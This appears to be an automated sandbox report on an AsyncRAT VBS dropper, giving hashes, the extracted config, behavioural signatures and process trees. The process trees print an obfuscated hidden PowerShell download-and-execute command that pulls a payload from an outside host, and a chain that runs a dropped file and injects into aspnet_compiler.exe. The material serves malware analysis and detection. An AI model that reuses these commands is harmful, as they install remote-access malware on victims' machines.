Analysis
-
max time kernel
140s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-10-2024 01:52
Static task
static1
Behavioral task
behavioral1
Sample
a823fe41d388ef2f59ba4ed377c6d4708115a9551089d95f066e116a608b8613.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a823fe41d388ef2f59ba4ed377c6d4708115a9551089d95f066e116a608b8613.vbs
Resource
win10v2004-20241007-en
General
-
Target
a823fe41d388ef2f59ba4ed377c6d4708115a9551089d95f066e116a608b8613.vbs
-
Size
5KB
-
MD5
d320aea9453c098f7b07ac1da85a9e7e
-
SHA1
1fcf8469a5b7197cca73c9665f43505d7a6c6ae3
-
SHA256
a823fe41d388ef2f59ba4ed377c6d4708115a9551089d95f066e116a608b8613
-
SHA512
2d883ac60a84b0e919274daec84bc5a6dbed9f1eb40f5dab6c1473d321211e245a27dcdc2ed4e9f9ed7ab9e08048ee3d34da333ad5cb950a2d934b59b20fb7bd
-
SSDEEP
48:epIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIrOTTS:etPXyTuGZOrHTu5Viajr
Malware Config
Extracted
asyncrat
AWS | 3Losh
New-Encrypt
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/M1nmWeTA
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 28 1344 powershell.exe 46 1344 powershell.exe 49 1344 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 4396 powershell.exe 2900 powershell.exe 1344 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 45 api.ipify.org 46 api.ipify.org -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process target process PID 4396 set thread context of 2428 4396 powershell.exe aspnet_compiler.exe PID 2900 set thread context of 4000 2900 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
aspnet_compiler.exeaspnet_compiler.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1344 powershell.exe 1344 powershell.exe 4396 powershell.exe 4396 powershell.exe 2900 powershell.exe 2900 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exeaspnet_compiler.exepowershell.exedescription pid process Token: SeDebugPrivilege 1344 powershell.exe Token: SeIncreaseQuotaPrivilege 1344 powershell.exe Token: SeSecurityPrivilege 1344 powershell.exe Token: SeTakeOwnershipPrivilege 1344 powershell.exe Token: SeLoadDriverPrivilege 1344 powershell.exe Token: SeSystemProfilePrivilege 1344 powershell.exe Token: SeSystemtimePrivilege 1344 powershell.exe Token: SeProfSingleProcessPrivilege 1344 powershell.exe Token: SeIncBasePriorityPrivilege 1344 powershell.exe Token: SeCreatePagefilePrivilege 1344 powershell.exe Token: SeBackupPrivilege 1344 powershell.exe Token: SeRestorePrivilege 1344 powershell.exe Token: SeShutdownPrivilege 1344 powershell.exe Token: SeDebugPrivilege 1344 powershell.exe Token: SeSystemEnvironmentPrivilege 1344 powershell.exe Token: SeRemoteShutdownPrivilege 1344 powershell.exe Token: SeUndockPrivilege 1344 powershell.exe Token: SeManageVolumePrivilege 1344 powershell.exe Token: 33 1344 powershell.exe Token: 34 1344 powershell.exe Token: 35 1344 powershell.exe Token: 36 1344 powershell.exe Token: SeIncreaseQuotaPrivilege 1344 powershell.exe Token: SeSecurityPrivilege 1344 powershell.exe Token: SeTakeOwnershipPrivilege 1344 powershell.exe Token: SeLoadDriverPrivilege 1344 powershell.exe Token: SeSystemProfilePrivilege 1344 powershell.exe Token: SeSystemtimePrivilege 1344 powershell.exe Token: SeProfSingleProcessPrivilege 1344 powershell.exe Token: SeIncBasePriorityPrivilege 1344 powershell.exe Token: SeCreatePagefilePrivilege 1344 powershell.exe Token: SeBackupPrivilege 1344 powershell.exe Token: SeRestorePrivilege 1344 powershell.exe Token: SeShutdownPrivilege 1344 powershell.exe Token: SeDebugPrivilege 1344 powershell.exe Token: SeSystemEnvironmentPrivilege 1344 powershell.exe Token: SeRemoteShutdownPrivilege 1344 powershell.exe Token: SeUndockPrivilege 1344 powershell.exe Token: SeManageVolumePrivilege 1344 powershell.exe Token: 33 1344 powershell.exe Token: 34 1344 powershell.exe Token: 35 1344 powershell.exe Token: 36 1344 powershell.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeDebugPrivilege 2428 aspnet_compiler.exe Token: SeDebugPrivilege 2900 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
WScript.exeWScript.exepowershell.exeWScript.exepowershell.exedescription pid process target process PID 3296 wrote to memory of 1344 3296 WScript.exe powershell.exe PID 3296 wrote to memory of 1344 3296 WScript.exe powershell.exe PID 1360 wrote to memory of 4396 1360 WScript.exe powershell.exe PID 1360 wrote to memory of 4396 1360 WScript.exe powershell.exe PID 4396 wrote to memory of 2428 4396 powershell.exe aspnet_compiler.exe PID 4396 wrote to memory of 2428 4396 powershell.exe aspnet_compiler.exe PID 4396 wrote to memory of 2428 4396 powershell.exe aspnet_compiler.exe PID 4396 wrote to memory of 2428 4396 powershell.exe aspnet_compiler.exe PID 4396 wrote to memory of 2428 4396 powershell.exe aspnet_compiler.exe PID 4396 wrote to memory of 2428 4396 powershell.exe aspnet_compiler.exe PID 4396 wrote to memory of 2428 4396 powershell.exe aspnet_compiler.exe PID 4396 wrote to memory of 2428 4396 powershell.exe aspnet_compiler.exe PID 1344 wrote to memory of 2900 1344 WScript.exe powershell.exe PID 1344 wrote to memory of 2900 1344 WScript.exe powershell.exe PID 2900 wrote to memory of 4000 2900 powershell.exe aspnet_compiler.exe PID 2900 wrote to memory of 4000 2900 powershell.exe aspnet_compiler.exe PID 2900 wrote to memory of 4000 2900 powershell.exe aspnet_compiler.exe PID 2900 wrote to memory of 4000 2900 powershell.exe aspnet_compiler.exe PID 2900 wrote to memory of 4000 2900 powershell.exe aspnet_compiler.exe PID 2900 wrote to memory of 4000 2900 powershell.exe aspnet_compiler.exe PID 2900 wrote to memory of 4000 2900 powershell.exe aspnet_compiler.exe PID 2900 wrote to memory of 4000 2900 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a823fe41d388ef2f59ba4ed377c6d4708115a9551089d95f066e116a608b8613.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://megamart.mywire.org:60027/comcast/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4000
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
1KB
MD5f95a106f047fea9403384bdf9fa33c43
SHA1ad4629335cc30cec6afa9cb2ac2d22d740963713
SHA2568ccbc7a63e9810f68b2bf16eb67b63ab7fc3da2a449eb0fb892c416f15a81192
SHA512fecf14d1558b574bb40b65e9b5746f9f7468a8df1b163668d963b886a3746b908642bebc82fc5a5753ca0ac0d6adb9cf2381a6438a52d42f3c55ae73db469574
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
436KB
MD5699160a16bdf0536e0fa69adcbab1e19
SHA1ae8a6be22f05e119e7031edc79fb4a21f1268500
SHA2564e7889d60aa6df54e7b646e8ba30befa9bba6ddfca3ac1a5894429e0caa86295
SHA512bf2b94320790d54a3c30a57a34877f5d5d55e918943f1180fef50901b86b61e1bd48dd8c7af0a1a82de7f0b0e2af7b65dc6471fc616846c4260811c2ddc5c145
-
Filesize
229B
MD566a1516e1d1e821084441211567d2e87
SHA10e688c9a93ad2cc162ef48ca75e0148e69d95ab1
SHA256d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717
SHA5121b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12